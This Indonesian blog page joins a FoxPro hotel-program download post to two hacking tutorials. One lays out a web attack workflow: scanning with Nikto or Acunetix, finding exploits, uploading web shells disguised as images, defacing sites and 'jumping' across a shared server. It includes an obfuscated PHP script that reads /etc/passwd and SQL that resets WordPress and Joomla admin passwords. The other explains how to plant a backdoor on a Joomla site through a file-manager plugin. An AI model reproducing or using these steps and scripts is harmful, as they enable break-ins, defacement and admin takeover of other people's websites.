Program Data Pelanggan Hotel Dengan FoxPro

Assalamualaikum......

baik pada posting ini saya akan membahas cara membuat program data pelanggan hotel dengan fox pro dengan bentuk tampilan formnya

Tutorial Program dapat di download disini

XDownload Free

File Data Pelanggan Hotel Server 1 [ 574 KB ] on 4shared     085356045406

Hahaha thx telha mengunjungi blog jelek ini jangan lupa ya like fan page facebook kami untuk dapat info ter-update blog ini

Sekian Terima Kasih Semoga bermanfaat

Alur Web Attack

Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan 
1. Scan

Cari tau dimana letak kelemahaan web target. bisa di scan  pakai beberapa tool scanner. diantaranya yang paling terkenal  :
         #Acunetix (Windows)
         # Nikto  (Linux)
Selain bisa mendapatkan bug kita juga bisa mengumpulkan informasi berguna dari web target

2. XPL / SQLi

Setelah menemukan data dari web target . kita coba cari cara untuk meng-exploitasi  bug bug  yang sudah kita temukan dengan tool scanner tadi . dibawah ini daftar situ yang menyediakan macam" exploit  :
      #Exploit Database
      #Packet Strom
      #Injector
      #Hackown

apabila target menggunakan css joomla / wordpress, kita dapat mencari exploit untuk plugin-plugin yang digunakan web target . karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhaanya. jadi kita tau isi folder dari web target , termasuk plugin-plugin apa saja yang digunakan .

Kalau tekni SQL dapat dilihat dari sini

Ebook beserta source website untuk praktek tenik sql download  disini

3. Upload Shell

website sudah bisa di exploitasi dan kita sudah bisa masuk ke halaman admin . sekarang kita tinggal upload sheel sekarang :

-Upload shell di wordpress bisa mengupload plugin or theme yang sudah di sisipi file shell
-Upload Shell di joomla juga sama, cuma  bisa juga menggunakan plugin Ninja Exploit
-Upload shell di CMS biasa bisa melalui upload gambar  , kalau tidak bisa coba shell"nya di rename menjadi shell.php.jpg lalu upload .

Setelah shell berhasil di upload tinggal di panggil letak URL shell"nya dimana.

4.Deface or Jumping

Kalau mau gaya" (Deface) ,cari file index.php atau semacamnya lalu rubah didalam dengan script deface yang kita punya . buat yang malas bikin script deface dapat menggunakan tool DefaceMaker. coba archive website yang sudah kita deface ke situs ini :

#Indonesia Defacer
#Magelang Cyber
#Zona-H

Tidak cukup hanya bisa men-deface satu web saja. coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface...
caranya....

Script jumping ;

Code:


$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('Error: Safe Mode is On');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die(' Error : Can Not Read Config Of Server '); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\​162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3​d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a​*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2​a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\​x2a\052";

?>

-Upload Script Jumping
-Rename jadi jumpingfinder.php
-Panggil Letak URL tersebut
-Masuk ke Public_html web target
-Masuk ke Mysql (Cari account Mysql di file config)
-Cari table User
-Update password Admin

#Wordpress

PHP Code:

UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1; 

#Joomla

PHP Code:

update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"; 

5.Rooting
  

Upload Backdoor di Joomla

Muter2 cari tutorial upload Backdoor di Joomla Version 1.5.20 gk nemu2, dagh berbagai cara di coba tapi tetep aja gk bisa. Hmm…jadi inget web korban, waktu itu dia pake Plugins NinjaXplorer.

Ok degh langsung Praktek ja :

1. Pertama Dongdot dolo Plugins’y disini :
http://extensions.joomla.org/extensions/core-enhancements/file-management/4746

2. Upload Plugins yg tadi dagh di Dongdot, Cara’y ente Liat Extensions trs klik Install/Uninstall disitu ada tombolUpload Nahh..Silahkan upload Plugins’y. tunggu beberapa saat sampe install Plugins selesai

3. OK…klo dagh selesai Upload Plugins and selesai install, selanjut’y arahkan mouse ke Tab Components. Nah udagh ke install khan Plugins yg tadi qta Upload, Selanjut’y masuk ke directory Plugins NinjaXplorer Tampilan’y seperti ini :






















4. Selesai Upload Backdoor, nanti backdoor qta berada di :

http://www.target.com/news/backdoor.php
atau
http://www.target.com/backdoor.php

Ok Selesai..